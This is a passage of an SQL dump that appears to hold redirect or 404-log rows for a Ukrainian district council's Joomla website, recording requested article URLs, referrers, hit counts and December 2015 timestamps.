00:00:00',301),(23028,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=930:2013-02-21-09-13-00&Itemid=86&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 18:53:01','0000-00-00 00:00:00',301),(23029,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=863:-qq&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-28 18:53:35','0000-00-00 00:00:00',301),(23030,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=933:-2013-2017-&Itemid=86&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 18:53:43','0000-00-00 00:00:00',301),(23031,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1336:2014-06-10-11-01-06&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 18:53:51','0000-00-00 00:00:00',301),(23032,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=999:2013-04-28-05-21-05&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 18:54:01','0000-00-00 00:00:00',301),(23033,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1331:2014-06-04-07-15-27&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 18:54:19','0000-00-00 00:00:00',301),(23034,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=771:------------2012-2015--&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-28 18:54:53','0000-00-00 00:00:00',301),(23035,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=646:2012-04-08-07-58-55&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 18:55:03','0000-00-00 00:00:00',301),(23036,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1024:----l---------2011-2014-r-&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 18:55:17','0000-00-00 00:00:00',301),(23037,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=706:-qq-2012-2015-&Itemid=82&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 18:55:25','0000-00-00 00:00:00',301),(23038,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1073:2013-08-30-11-12-19&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 18:55:31','0000-00-00 00:00:00',301),(23039,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=827:2012-11-20-17-44-21&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-28 18:55:41','0000-00-00 00:00:00',301),(23040,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=802:-i-i-i-i-i&Itemid=0&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 18:56:27','0000-00-00 00:00:00',301),(23041,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1090:-l-r-&Itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 18:56:43','0000-00-00 00:00:00',301),(23042,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=192:2010-12-15-13-29-12&Itemid=60&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 18:56:59','0000-00-00 00:00:00',301),(23043,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=619:-11-6-&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-28 18:57:09','0000-00-00 00:00:00',301),(23044,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=759:2012-09-14-08-35-05&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 18:57:35','0000-00-00 00:00:00',301),(23045,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=501:2011-12-14-13-07-32&Itemid=73&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 18:57:43','0000-00-00 00:00:00',301),(23046,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1001:2013-04-30-12-14-17&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 18:58:32','0000-00-00 00:00:00',301),(23047,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=963:2013-03-13-06-16-53&Itemid=0&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-28 19:01:02','0000-00-00 00:00:00',301),(23048,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1279:2014-04-13-11-36-46&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 19:01:14','0000-00-00 00:00:00',301),(23049,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=747:2012-08-03-09-21-28&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 19:01:30','0000-00-00 00:00:00',301),(23050,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=488:2011-12-02-06-34-46&Itemid=73&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 19:01:48','0000-00-00 00:00:00',301),(23051,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=581:2012-02-27-13-13-19&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 19:01:54','0000-00-00 00:00:00',301),(23052,'http://www.malyn-rayrada.org.ua/index.php?catid=37&id=440:2011-10-21-16-24-47&Itemid=72&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 19:02:20','0000-00-00 00:00:00',301),(23053,'http://www.malyn-rayrada.org.ua/index.php/797-vidbulas-koordinacijna-rada-pri-golovi-rajonnoi?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-28 19:14:38','0000-00-00 00:00:00',301),(23054,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=679:2012-05-17-10-00-53&Itemid=80&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-28 19:16:47','0000-00-00 00:00:00',301),(23055,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1203:-2014-&Itemid=97&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 19:17:17','0000-00-00 00:00:00',301),(23056,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1109:2013-10-18-10-25-30&lang=en&option=com_content&view=article','','','',2,0,'2015-12-28 19:17:30','0000-00-00 00:00:00',301),(23057,'http://www.malyn-rayrada.org.ua/index.php?catid=31&id=274:2011-03-28-08-22-32&Itemid=62&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-28 19:22:05','0000-00-00 00:00:00',301),(23058,'http://www.malyn-rayrada.org.ua/index.php?catid=53&id=1114:-lr-&Itemid=94&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 19:24:06','0000-00-00 00:00:00',301),(23059,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1294:-2012-2015-&Itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 20:06:31','0000-00-00 00:00:00',301),(23060,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=619:-11-6-&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 20:06:41','0000-00-00 00:00:00',301),(23061,'http://www.malyn-rayrada.org.ua/index.php?catid=46&id=842:2012-12-10-13-55-57&Itemid=85&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 20:07:29','0000-00-00 00:00:00',301),(23062,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=669:-2011-56-&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-28 20:09:43','0000-00-00 00:00:00',301),(23063,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1279:2014-04-13-11-36-46&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 20:11:00','0000-00-00 00:00:00',301),(23064,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=475:2011-11-22-07-58-34&Itemid=73&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-28 20:15:32','0000-00-00 00:00:00',301),(23065,'http://www.malyn-rayrada.org.ua/index.php?catid=54&id=1144:-lr&Itemid=95&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-28 20:15:49','0000-00-00 00:00:00',301),(23066,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=774:2012-10-02-09-30-45&Itemid=84&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 20:19:01','0000-00-00 00:00:00',301),(23067,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=312:-2011-&Itemid=66&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 20:20:01','0000-00-00 00:00:00',301),(23068,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1269-pro-znyattya-z-kontrolyu-rishen-rajonnoji-radi','','','',1,0,'2015-12-28 20:22:49','0000-00-00 00:00:00',301),(23069,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1127:2013-11-05-12-58-04&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 20:24:59','0000-00-00 00:00:00',301),(23070,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1092:2013-09-19-12-18-37&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 20:30:10','0000-00-00 00:00:00',301),(23071,'http://www.malyn-rayrada.org.ua/index.php/264-6-ljutogo-2012-roku-vipadkove-foto?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-28 21:53:28','0000-00-00 00:00:00',301),(23072,'http://www.malyn-rayrada.org.ua/index.php/821-vidbuvsja-viiznij-seminar?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-28 22:22:47','0000-00-00 00:00:00',301),(23073,'http://malyn-rayrada.org.ua/media/editors/tinymce/skins/lightgray/img/thumb.php','','http://malyn-rayrada.org.ua/media/editors/tinymce/skins/lightgray/img/thumb.php','',2,0,'2015-12-28 22:38:41','0000-00-00 00:00:00',301),(23074,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1256:2014-03-27-17-22-43&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 22:39:11','0000-00-00 00:00:00',301),(23075,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&id=33:-20052011&lang=en&layout=blog&limitstart=5&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2015-12-28 22:41:54','0000-00-00 00:00:00',301),(23076,'http://www.malyn-rayrada.org.ua/index.php/1092-ogoloshennya-malinskoji-rajonnoji-blagodijnoji-organizatsiji-zakhist-ditej-chornobilya-shchodo-vidpochinku?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-28 22:41:55','0000-00-00 00:00:00',301),(23077,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=999:2013-04-28-05-21-05&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-28 23:22:15','0000-00-00 00:00:00',301),(23078,'http://www.malyn-rayrada.org.ua/index.php/720-do-vidoma-pensioneriv/','','http://go.mail.ru/search_images','',3,0,'2015-12-28 23:27:31','0000-00-00 00:00:00',301),(23079,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1153:-2013-&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 23:53:24','0000-00-00 00:00:00',301),(23080,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=472:-------------l-r-------&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-29 00:02:26','0000-00-00 00:00:00',301),(23081,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1270:2014-04-08-13-49-40&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 00:07:24','0000-00-00 00:00:00',301),(23082,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1349:-31-&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 00:14:24','0000-00-00 00:00:00',301),(23083,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=734:-6-2012-&Itemid=0&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 00:44:22','0000-00-00 00:00:00',301),(23084,'http://www.malyn-rayrada.org.ua/index.php/1197-znyato-z-poryadku-dennogo-shche-odnu-problemu-likarni?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-29 00:47:38','0000-00-00 00:00:00',301),(23085,'http://www.malyn-rayrada.org.ua/index.php?catid=34:--15062011-&id=345:2011-06-15-12-28-17&Itemid=68&lang=en&option=com_content&view=article','','','',77,0,'2015-12-29 00:53:40','0000-00-00 00:00:00',301),(23086,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=749:2012-08-24-05-59-17&lang=en&option=com_content&view=article','','','',4,0,'2015-12-29 01:04:59','0000-00-00 00:00:00',301),(23087,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1195:2014-01-28-13-01-27&Itemid=97&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-29 01:08:10','0000-00-00 00:00:00',301),(23088,'http://www.malyn-rayrada.org.ua/index.php?catid=42:--16052012-&id=676:2012-05-17-09-52-12&Itemid=80&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 01:08:14','0000-00-00 00:00:00',301),(23089,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=703:-2012-&Itemid=82&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 01:08:57','0000-00-00 00:00:00',301),(23090,'http://www.malyn-rayrada.org.ua/index.php?catid=10:2010-06-05-13-46-44&id=1286:2014-04-23-06-48-27&Itemid=17&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 01:13:28','0000-00-00 00:00:00',301),(23091,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=314:2011-05-20-13-01-00&Itemid=66&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-29 01:27:22','0000-00-00 00:00:00',301),(23092,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1073:2013-08-30-11-12-19&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 01:36:20','0000-00-00 00:00:00',301),(23093,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1097:2013-09-25-08-35-50&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 01:39:26','0000-00-00 00:00:00',301),(23094,'http://www.malyn-rayrada.org.ua/index.php?id=45&Itemid=84&lang=en&layout=blog&limitstart=30&option=com_content&view=category','','','',1,0,'2015-12-29 01:42:25','0000-00-00 00:00:00',301),(23095,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=613:2012-03-26-14-13-34&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 01:44:28','0000-00-00 00:00:00',301),(23096,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1053:2013-07-19-11-34-22&Itemid=92&lang=en&option=com_content&view=article','','','',2,0,'2015-12-29 01:47:15','0000-00-00 00:00:00',301),(23097,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=568:-2011-&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 01:53:07','0000-00-00 00:00:00',301),(23098,'http://www.malyn-rayrada.org.ua/index.php?catid=32:2011-03-31-12-03-04&id=854:2012-12-11-13-40-55&Itemid=64&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 01:55:52','0000-00-00 00:00:00',301),(23099,'http://www.malyn-rayrada.org.ua/index.php?catid=47:-21022013-&id=914:2013-01-23-13-21-28&Itemid=86&lang=en&option=com_content&view=article','','','',2,0,'2015-12-29 02:02:21','0000-00-00 00:00:00',301),(23100,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1109:2013-10-18-10-25-30&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 02:04:57','0000-00-00 00:00:00',301),(23101,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/malinshchina-ta-malinchani','','','',26,0,'2015-12-29 02:06:48','0000-00-00 00:00:00',301),(23102,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?catid=79&id=1270:pro-zatverdzhennya-planu-diyalnosti-rajonnoji-radi-z-pidgotovki-proektiv-regulyatornikh-aktiv-na-2016-rik','','','',8,0,'2015-12-29 02:07:10','0000-00-00 00:00:00',301),(23103,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=779:2012-10-03-12-34-44&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 02:07:30','0000-00-00 00:00:00',301),(23104,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1146:2013-11-27-10-09-00&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-29 02:13:00','0000-00-00 00:00:00',301),(23105,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=589:2012-02-27-13-52-30&Itemid=77&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 02:18:29','0000-00-00 00:00:00',301),(23106,'http://www.malyn-rayrada.org.ua/index.php?catid=5&id=519:-2011-&Itemid=6&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 02:24:37','0000-00-00 00:00:00',301),(23107,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1060:2013-07-27-10-13-15&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 02:28:14','0000-00-00 00:00:00',301),(23108,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=482:-2012-2015-&Itemid=73&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 02:47:08','0000-00-00 00:00:00',301),(23109,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1081:-2013-2017-&Itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 02:50:18','0000-00-00 00:00:00',301),(23110,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=926:2013-02-21-09-02-30&Itemid=86&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-29 02:51:20','0000-00-00 00:00:00',301),(23111,'http://www.malyn-rayrada.org.ua/index.php?catid=57&id=1274:-l-r&Itemid=98&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 02:55:45','0000-00-00 00:00:00',301),(23112,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1011:2013-05-29-09-51-28&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-29 02:58:05','0000-00-00 00:00:00',301),(23113,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1014:2013-06-03-06-43-44&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 03:02:54','0000-00-00 00:00:00',301),(23114,'http://www.malyn-rayrada.org.ua/index.php?catid=32:2011-03-31-12-03-04&id=853:2012-12-11-13-39-46&Itemid=64&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 03:05:15','0000-00-00 00:00:00',301),(23115,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=703:-2012-&Itemid=82&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 03:07:37','0000-00-00 00:00:00',301),(23116,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1126:2013-10-31-12-52-35&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-29 03:13:20','0000-00-00 00:00:00',301),(23117,'http://www.malyn-rayrada.org.ua/index.php?catid=46:--21122012&id=850:-2013-&Itemid=85&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 03:24:45','0000-00-00 00:00:00',301),(23118,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=767:2012-10-01-08-20-30&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 03:35:29','0000-00-00 00:00:00',301),(23119,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1062:2013-07-29-13-33-29&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 03:41:14','0000-00-00 00:00:00',301),(23120,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1181:2014-01-22-06-06-13&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-29 03:44:00','0000-00-00 00:00:00',301),(23121,'http://www.malyn-rayrada.org.ua/index.php?catid=29:--15122010-&id=197:-----l-r--2004-2010-&Itemid=60&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 03:45:49','0000-00-00 00:00:00',301),(23122,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1115:-24-&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 03:46:47','0000-00-00 00:00:00',301),(23123,'http://www.malyn-rayrada.org.ua/index.php?catid=54&id=1142:-l-r-&Itemid=95&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-29 03:46:50','0000-00-00 00:00:00',301),(23124,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1071:2013-08-27-14-06-18&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 03:46:58','0000-00-00 00:00:00',301),(23125,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1051:--------4------&Itemid=92&lang=en&option=com_content&view=article','','','',2,0,'2015-12-29 03:49:05','0000-00-00 00:00:00',301),(23126,'http://www.malyn-rayrada.org.ua/index.php?catid=54&id=1143:2013-11-26-13-23-37&Itemid=95&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 03:56:45','0000-00-00 00:00:00',301),(23127,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1193:-2014-2015-&Itemid=97&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 04:01:17','0000-00-00 00:00:00',301),(23128,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=479:2011-11-28-07-33-14&Itemid=73&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 04:06:18','0000-00-00 00:00:00',301),(23129,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=600:2012-03-01-06-12-24&Itemid=&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 04:08:18','0000-00-00 00:00:00',301),(23130,'http://www.malyn-rayrada.org.ua/index.php?catid=34:--15062011-&id=344:2011-06-15-12-25-27&Itemid=68&lang=en&option=com_content&view=article','','','',2,0,'2015-12-29 04:14:46','0000-00-00 00:00:00',301),(23131,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=475:2011-11-22-07-58-34&catid=38:--19122011-&Itemid=73&lang=ru','','','',2,0,'2015-12-29 04:15:05','0000-00-00 00:00:00',301),(23132,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=794:-lr&Itemid=84&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 04:21:45','0000-00-00 00:00:00',301),(23133,'http://www.malyn-rayrada.org.ua/index.php?catid=53&id=1119:2013-10-25-12-26-37&Itemid=94&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 04:28:22','0000-00-00 00:00:00',301),(23134,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1074:2013-09-02-05-02-30&lang=en&option=com_content&view=article','','','',2,0,'2015-12-29 04:30:22','0000-00-00 00:00:00',301),(23135,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/malinshchina-ta-malinchani/2014-09-22-17-50-18?page=3','','','',24,0,'2015-12-29 04:35:41','0000-00-00 00:00:00',301),(23136,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1154:7-&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 04:39:43','0000-00-00 00:00:00',301),(23137,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1279:2014-04-13-11-36-46&Itemid=&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 04:45:09','0000-00-00 00:00:00',301),(23138,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=940:2013-02-21-14-02-14&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 04:52:29','0000-00-00 00:00:00',301),(23139,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1087:--------12--2013---398-l-------2013-r---19--2013---416-l-------2013-r&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-29 04:55:36','0000-00-00 00:00:00',301),(23140,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1287-pro-vstanovlennya-rozmiru-vartosti-kharchuvannya-ta-batkivskoji-plati-u-doshkilnikh-navchalnikh-zakladakh-na-2016-rik','','','',8,0,'2015-12-29 04:57:50','0000-00-00 00:00:00',301),(23141,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1174:-2013-&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 05:00:52','0000-00-00 00:00:00',301),(23142,'http://www.malyn-rayrada.org.ua/index.php?catid=53&id=1089:-l-r-&Itemid=94&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 05:03:48','0000-00-00 00:00:00',301),(23143,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1192:-2014-2015-&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 05:07:09','0000-00-00 00:00:00',301),(23144,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=762:-210-&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 05:10:38','0000-00-00 00:00:00',301),(23146,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1109:2013-10-18-10-25-30&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 05:24:24','0000-00-00 00:00:00',301),(23148,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1007:-4-&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 05:27:23','0000-00-00 00:00:00',301),(23149,'http://www.malyn-rayrada.org.ua/index.php?id=53:--25102013-&Itemid=94&lang=uk&layout=blog&option=com_content&view=category','','','',3,0,'2015-12-29 05:37:11','0000-00-00 00:00:00',301),(23150,'http://www.malyn-rayrada.org.ua/index.php/670-7-grudnja-den-miscevogo-samovrjaduvannja?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-29 05:41:18','0000-00-00 00:00:00',301),(23151,'http://www.malyn-rayrada.org.ua/index.php?catid=42:--16052012-&id=683:------------------------2012-&Itemid=80&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 05:42:15','0000-00-00 00:00:00',301),(23152,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=958:------------2010-2015-&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 05:44:29','0000-00-00 00:00:00',301),(23153,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1181:2014-01-22-06-06-13&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 05:50:58','0000-00-00 00:00:00',301),(23154,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=792:2012-10-17-06-26-37&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 05:52:49','0000-00-00 00:00:00',301),(23155,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=963:2013-03-13-06-16-53&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 05:56:11','0000-00-00 00:00:00',301),(23156,'http://www.malyn-rayrada.org.ua/index.php?id=56&Itemid=97&lang=ru&layout=blog&limitstart=5&option=com_content&view=category','','','',1,0,'2015-12-29 06:04:53','0000-00-00 00:00:00',301),(23157,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1256:2014-03-27-17-22-43&Itemid=&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-29 06:10:25','0000-00-00 00:00:00',301),(23158,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=504:-2012-&Itemid=73&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 06:12:08','0000-00-00 00:00:00',301),(23159,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=834:-20-&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 06:13:41','0000-00-00 00:00:00',301),(23160,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=995:-2012-&Itemid=&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 06:15:08','0000-00-00 00:00:00',301),(23161,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1087:--------12--2013---398-l-------2013-r---19--2013---416-l-------2013-r&Itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 06:16:40','0000-00-00 00:00:00',301),(23162,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1060:2013-07-27-10-13-15&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 06:18:10','0000-00-00 00:00:00',301),(23163,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1094:2013-09-24-05-02-52&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 06:21:26','0000-00-00 00:00:00',301),(23164,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1115:-24-&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-29 06:22:38','0000-00-00 